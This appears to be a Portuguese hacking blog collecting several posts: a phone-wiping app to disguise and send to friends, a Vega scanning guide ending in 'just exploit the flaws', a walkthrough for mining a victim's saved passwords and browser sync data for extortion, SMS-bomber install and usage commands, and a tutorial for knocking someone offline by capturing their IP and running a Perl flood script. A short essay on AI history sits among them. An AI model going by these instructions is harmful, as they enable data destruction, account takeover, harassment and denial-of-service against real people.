᥀🔥APLICATIVO QUE FORMATA O CELULAR ! BAIXE E MANDE PARA SEUS AMIGOS!! [APK] [2020] [DOWNLOAD]᥀🔥

(Gif Ilustrativo)

Formatar um aparelho implica em apagar totalmente o seu conteúdo, sendo necessário reinstalar seu sistema operacional do zero. Imagens, fotos e documentos são eliminados, e não podem ser recuperados novamente.

Esse aplicativo pode servi pra você trollar seus amigos , enviando para eles via whatsapp ou qualquer outro meio de comunicação , mas tome cuidado ao fazer isso!.

Obs¹: É apenas um app que formata o celular você pode estar mudando o nome do app para enganar seus amigos ou use outro tipo de engenharia social que você achar melhor!

Obs²: Vamos disponibilizar dois aplicativos que formata o celular !

VÍDEO DO APLICATIVO:

WIFI HACK (formatar) #1

WIFI HACK (formatar) #2

PSHIPON (formatar)

᥀🔥LEVANTANDO VULNERABILIDADES DE UM SITE – VEGA᥀🔥

Apresentação

Vega é um scanner de segurança web gratuito e de código aberto e plataforma de teste de segurança web para testar a segurança de aplicações web.


Instalação:

apt-get uptade apt-get install vega

ou visite: subgraph.com/vega/download/index.en.html

Após ter o Vega instalado, inicie ele.

Esse é a interface do Vega. 

Vamos realizar um scanner. 

Aperte CTRL + N

Coloque o site desejado e de Next

Vai aparecer duas caixinhas, essas caixinhas vem marcadas com as principais vulnerabilidades, você desmarcando e marcando o Vega ira fazer um scanner profundo, com mais de 20 opções de scanner.

Vai aparecer essas opções, são de cookies e autenticação de identidade na hora do scanner, isso vai de vocês colocarem ou não.

Clicamos em Finish.

O scanner vai começar, pode demorar, dependendo das opções que você colocou, da sua internet ou se você esta utilizando alguma VPN ou PROXY.

Após de um certo tempo, meu scanner terminou e retornou as falhas que eu queria.

Depois disso é só explorar as vulnerabilidades encontradas.

Foi um tutorial básico, o Vega tem varias outras configurações.

᥀🔥INTELIGÊNCIA ARTIFÍCIAL᥀🔥

Inteligência Artificial (IA) é um ramo da ciência da computação que se propõe a elaborar dispositivos que simulem a capacidade humana de raciocinar, perceber, tomar decisões e resolver problemas, enfim, a capacidade de ser inteligente.

Existente há décadas, esta área da ciência é grandemente impulsionada com o rápido desenvolvimento da informática e da computação, permitindo que novos elementos sejam rapidamente agregados à IA.
História

Iniciada dos anos 1940, a pesquisa em torno desta incipiente ciência eram desenvolvidas apenas para procurar encontrar novas funcionalidades para o computador, ainda em projeto. Com o advento da Segunda Guerra Mundial, surgiu também a necessidade de desenvolver a tecnologia para impulsionar a indústria bélica.
Com o passar do tempo, surgem várias linhas de estudo da IA, uma delas é a biológica, que estuda o desenvolvimento de conceitos que pretendiam imitar as redes neurais humanas. Na verdade, é nos anos 60 em que esta ciência recebe a alcunha de Inteligência Artificial e os pesquisadores da linha biológica acreditavam ser possível máquinas realizarem tarefas humanas complexas, como raciocinar.
Depois de um período negro, os estudos sobre redes neurais volta à tona nos anos 1980, mas é nos anos de 1990 que ela tem um grande impulso, consolidando-a verdadeiramente como a base dos estudos da IA.
IA na vida real

Hoje em dia, são várias as aplicações na vida real da Inteligência Artificial: jogos, programas de computador, aplicativos de segurança para sistemas informacionais, robótica (robôs auxiliares), dispositivos para reconhecimentos de escrita a mão e reconhecimento de voz, programas de diagnósticos médicos e muito mais.
IA na ficção

Um tema bastante recorrente em histórias de ficção científica, a Inteligência Artificial está presente em livros, desenhos animados e filmes. Um autor de grande destaque nesta área é o russo Isaac Asimov, autor de histórias de sucesso como O Homem Bicentenário e Eu, Robô. Ambas receberam adaptação para o cinema. Outra história que caiu nas graças do público foi AI: Inteligência Artificial, dirigido por Steven Spielberg.
Porém, nem tudo são flores na visão daqueles que levam a IA para a ficção. Filmes como 2001: Uma Odisséia no Espaço, dirigido por Stanley Kubrick, Matrix, de Andy e Larry Wachowski, e Exterminador do Futuro, dirigido por James Cameron, mostram como a humanidade pode ser subjugada por máquinas que conseguem pensar como o ser humano e ser mais frias e indiferentes a vida do que seus semelhantes de carne e osso.
A controvérsia

Baseando-se em histórias fictícias como as citadas anteriormente, não é difícil imaginar o caos que poderá ser causado por seres de metal, com um enorme poder físico e de raciocínio, agindo independentemente da vontade humana. Guerras desleais, escravidão e até mesmo a extinção da humanidade estão no rol das conseqüências da IA.
Por outro lado, robôs inteligentes podem ser de grande utilidade na medicina, diminuindo o número de erros médicos, na exploração de outros planetas, no resgate de pessoas soterradas por escombros, além de sistemas inteligentes para resolver cálculos e realizar pesquisas que poderão encontrar cura de doenças. Como pode ser notado, a Inteligência Artificial é um tema complexo e bastante controverso. São diversos os pontos a favor e contra e cada lado tem razão em suas afirmações. Cabe a nós esperar que, independente dos rumos que os estudos sobre IA tomem, eles sejam guiados pela ética e pelo bom senso.

᥀🔥SEGURANÇA EM BACKUP᥀🔥

Imagine se o atacante colocou um arquivo malicioso em sua conta de backup (Dropbox, ADrive, Google Drive e entre outros) .

Esse tipo de ataque acontece em servidores da OneDrive que já vem instalado nos sistemas operacionais Windows.
O OneDrive é um serviço de armazenamento na nuvem da Microsoft que oferece a opção de guardar até 7 GB de arquivos grátis na rede. 

Sabendo apenas o login do email, o atacante consegue acesso a pasta OneDrive do sistema alvo. 

Como estou apenas demonstrando uma invasão, loguei em minha conta, parece que temos apenas uma pasta com 680KB.

Agora imagine uma conta com vários documentos, planilhas, fotos, arquivos importantes.
Aqui vemos algumas opções dele, como de upload (aqui o atacante poder upar o arquivo malicioso). 

Alguns dos meus arquivos que eu deixei salvo, que podem ser facilmente manipulados (principalmente arquivos .docx e entre outros do pacote office)

᥀🔥INVASÃO DE PRIVACIDADE: O BÁSICO᥀🔥

Esse tutorial mostra como obter diversas informações pessoais de alguém.

O que vamos precisar:

Um email e senha.

Bom, a primeira coisa que eu fiz quando eu peguei o email foi verificar onde ele cadastrado.

Fui em 3 lugares:

1. Contas em redes sociais

2. Gmail/Hotmail/Yahoo

3. Verificar se ele tem backup em algum navegador (sync)


Entrei na conta do Gmail e lembrei que o Google disponibiliza sites onde foram salva as senhas:

Esses foram alguns sites que estavam com o login salvo (com outros emails, cpfs e etc).

Para verificar se a vitima tem logins em outros sites, nós podemos usar algum browser com a opção de sync.

A opção de sync também nós mostra logins em outros sites e também históricos.

Com isso, alguém mal-intencionado pode fazer qualquer coisa, vai de engenharia social a extorsão.

᥀🔥ENTENDA O QUE É FOOTPRINTING᥀🔥

A coleta de informações (ou footprinting) é a primeira etapa que deve ocorrer em um pentest. O reconhecimento consiste em obter todas as informações a respeito da rede (topologia, mapeamento, servidores, funcionários etc.). Quanto mais informações coletadas, maior a probabilidade de acesso ao sistema auditado.

Todas as informações relacionadas ao segmento da empresa – servidores, roteadores, firewalls, hábitos dos funcionários e sua capacitação, pessoas relacionadas á empresa, empresas terceirizadas, emails, facebook, telefones, informações jogadas no lixo etc. – auxiliam ao processo de coleta de informações.
Podemos aplicar a engenharia social, a qual contribuirá de forma significativa com o aumento das informações pesquisadas. Por meio das informações do Google, do Yahoo e de outros mecanismo de busca, em poucas horas conseguimos uma gama de informações que potencializa o teste de intrusão.
Um bom inicio para coletar informações é começar pesquisando no site alvo. Comece lendo o site, veja quais são os dominios associados etc. Obtenha o maximo de informações que conseguir. Com certeza o leitor encontrará emails de contato, nomes relacionados á administração e outras informações bem interessantes. Com essas informações é possivel criar uma lista de palavras que servirá para futuros ataques (como quebra de sistemas de login – HTTP, SMTP, WPA2 etc). Acredite, sites revelam muitas informações a respeito do nosso alvo, vale a pena checá-lo. Uma dica que lhe dou é também buscar informações do site em repositorios como o archive.org. O Passado de um site é revelado.
Com as informações básicas enumeradas, o próximo passo para montarmos o nosso plano de ataque é coletar informações a respeito do domínio a ser testado. O domínio vai exibir dados públicos que podem ser de interesse para atacantes. Realizado uma busca no domínio do nosso alvo, obtemos informações como email do responsável, servidores DNS (que serão utilizados para enumeração DNS e transferência de zona), país etc. O comando whois do Linux pode ser usado para buscar e enumerar informações de um domínio em órgãos regulamentadores. Mas antes de de utilizá-lo, vamos entender como funciona a estrutura de domínios na internet.
Cada país possui um órgão regulamentar de domínios. Por exemplo, no Brasil, o responsável por regulamentar o domínio é o registro.br. Cada órgão regulamentador é controlado por uma entidade superior. Por exemplo, o registro.br é vinculado ao Lacnic (Entidade responsável pelo gerenciamento de domínios da América Latina. O órgão responsável pelo gerenciamento de todos os continentes é p IANA (a futura organização será a ICANN).

Abra o seu terminal e digite:

Exemplo: whois http://www.microsoft.com.br

As informações básicas são exibidas (servidores DNS, a pessoa responsável por aquele domínio juntamente com o email dela), será necessário realizara enumeração DNS. A enumeração DNS é um passo importante para o mapeamento da infraestrutura da rede, pois com o DNS podemos descobrir quais são os domínios que respondem por qual faixa de IPs.

᥀🔥ANOTHER SMS BOMBER ~ FLOOD DE SMS VIA TERMUX – NOVO SCRIPT [2020] [DOWNLOAD]᥀🔥

Recursos:

Muitas APIs de SMS integradas e suporte para configuração de API personalizada!

Número ilimitado de SMSs (com suporte de proxy para bombas enormes!).

Mais rápido e mais leve do que a maioria dos aplicativos / scripts do SMS Bomber.

Bombardeio internacional disponível.

Requisitos:

Qualquer coisa que possa rodar Windows, macOS ou Linux e tenha um teclado.

Python 3 e PIP instalados nele.

Instalação e configuração:

É tão fácil quanto digitar os comandos abaixo em seu terminal.

git clone 

https://github.com/AvinashReddy3108/YetAnotherSMSBomber.git 

cd YetAnotherSMSBomber

pip3 install -r requisitos.txt

DOWNLOAD MANUAL:

꙳ ꦿ⃟ۜ✯SMS BOMBER⸼ꦿ🌹⁩

Opções:

Você também pode ler isto via python3 bomber.py -houpython3 bomber.py –help


Exemplos# O padrão – 25 tópicos, 50 SMSs, Código do país: +91


python3 bomber.py

# Contagem e proxy de SMS personalizados.

python3 bomber.py –num 1000 –proxy

python3 bomber.py -N 1000 -P

# Arquivo de configuração e proxy da API customizada.

python3 bomber.py –config-path ” ./config.json ” –proxy

python3 bomber.py -C ” ./config.json ” -P

# Veja como usar todos os parâmetros possíveis a seu gosto.

python3 bomber.py –proxy –num 500 –country 91 –timeout 20

python3 bomber.py -p -N 500 -c 91 -T 30 -t 20

᥀🔥COMO DERRUBAR A INTERNET DE ALGUÉM PELO O iP – (VIA CAVEIRA TECH) [AVANÇADO] [2020] [TUTORIAL]᥀🔥

TUTORIAL APROVADO POR UNS DOS MAIORES FORUNS BR , CAVEIRA TECH.

Olá pessoal, hoje vou ensiná-los como derrubar conexões a internet através do endereço IP. Primeiramente, vamos explicar como isso funciona.

A vítima está sempre vulnerável de alguma forma a ataques e exposição do seu endereço IP, então podemos fácilmente obter o endereço IP dela através de 2 métodos bem conhecidos atualmente: o primeiro é atráves de Skype Resolvers, que utilizam o nome Skype da vítima para capturar seu IP. O outro método é através de IP Logger, um link que irá capturar o IP da vítima quando ela abri-lo.

Lembrando que o primeiro método é o mais fácil, porém muitas vezes não funciona pela quantidade de pessoas que hoje usam do mesmo, portanto, o método mais recomendando é através de IP Loggers.

꙳ ꦿ⃟ۜ✯SKYPE RESOLVER⸼ꦿ🌹⁩

꙳ ꦿ⃟ۜ✯iP LOGGER⸼ꦿ🌹⁩

Depois de capturar o IP da vítima, iremos precisar de um VPS para realizar o ataque. Um VPS é um computador remoto que você irá utilizar para os ataques, pois se o ataque fosse realizado em seu próprio computador, sua internet não iria aguentar o número de pacotes enviados a vítima e iria cair, por isso o VPS (Virtual Private Server) é o mais recomendado para isso, já que sua conexão é americana (Os melhores são do Texas) e possuem grande quantidade de Upload.


VPS recomendado: (Utilizem o código promocional MAMATAVPS no final da compra para ganhar 10% de desconto em qualquer plano).

꙳ ꦿ⃟ۜ✯LIGHT VPS⸼ꦿ🌹⁩

Depois de adqurir a VPS, vocês terão que instalar o programa Active Perl para poder executar Scripts programados em Perl no Windows, que por padrão não suporta.

꙳ ꦿ⃟ۜ✯ACTIVE PERL⸼🌹⁩

Depois de instalar o Active Perl, você deve abrir o Bloco de Notas ou semelhante e colar o código do link abaixo.


꙳ ꦿ⃟ۜ✯SCRIPT P/ ATAQUE⸼🌹⁩

Depois de colar o Script, você deve clicar em Salvar como e colocar o nome flood.pl, e em baixo você marca Todos os arquivos ou All files. Salve o Script na Área de trabalho ou Desktop.

Depois de ter feito todos os passos anteriores, você irá abrir o menu Iniciar do seu PC, vai ir em Executar e digitar cmd, depois dê enter. Irá abrir um tela preta, não se apavore. Nessa tela, você irá navegar até a Área de trabalho/Desktop onde se encontra o Script que você irá utilizar para derrubar a vítima. Funciona mais ou menos assim:

Você está no seguinte local (Exemplo):

C:/Windows
Para você voltar para C:/, você digita:
cd ../
Agora você está no C:/ apenas.
Para avançar novamente para a pasta Windows, você digita:
cd Windows
Agora você está em C:/Windows novamente.
Para você voltar de qualquer local para o a raíz novamente (C:/), você irá digitar:
cd \
Supomos que sua Área de trabalho ou Desktop se encontra em:
C:/Users/Administrador/Desktop
Você está no seguinte local no cmd:
C:/Windows
Você vai digitar o seguinte para chegar a sua Área de trabalho/Desktop:
cd \

cd Users

cd Administrador

cd Desktop

Pronto, você chegou na Área de trabalho/Desktop. Seu Script que você irá utilizar para derrubar suas vítimas está nesse local. Agora você irá digitar o seguinte comando:


flood.pl


Depois, o Script irá lhe retornar os comandos corretos para realizar o ataque. Basta você se basear nesses exemplos que o Script lhe mostra para atacar sua vítima.

O ataque funciona assim:


flood.pl

flood.pl = Script.

= IP da vítima que você capturou com o Skype Resolver ou IP Logger.

= 80 (Utilize sempre essa)

= Algo entre 64 e 1024. Digamos que isso é a força do ataque, sendo 64 = fraco, 128 = médio, 256 = forte, 512 = bem forte, 1024 = potência total.

= Aqui você coloca o Tempo que você deseja ficar atacando em segundos. Exemplo: 60 = 1 minuto.


O comando ficaria mais ou menos assim:


flood.pl 127.0.0.1 80 1024 500


Depois de criar o comando, basta dar um Enter e aguardar a vítima cair.

Crie um website ou blog gratuito no WordPress.com.

Acima ↑

Crie um site como este com o WordPress.com
Comece agora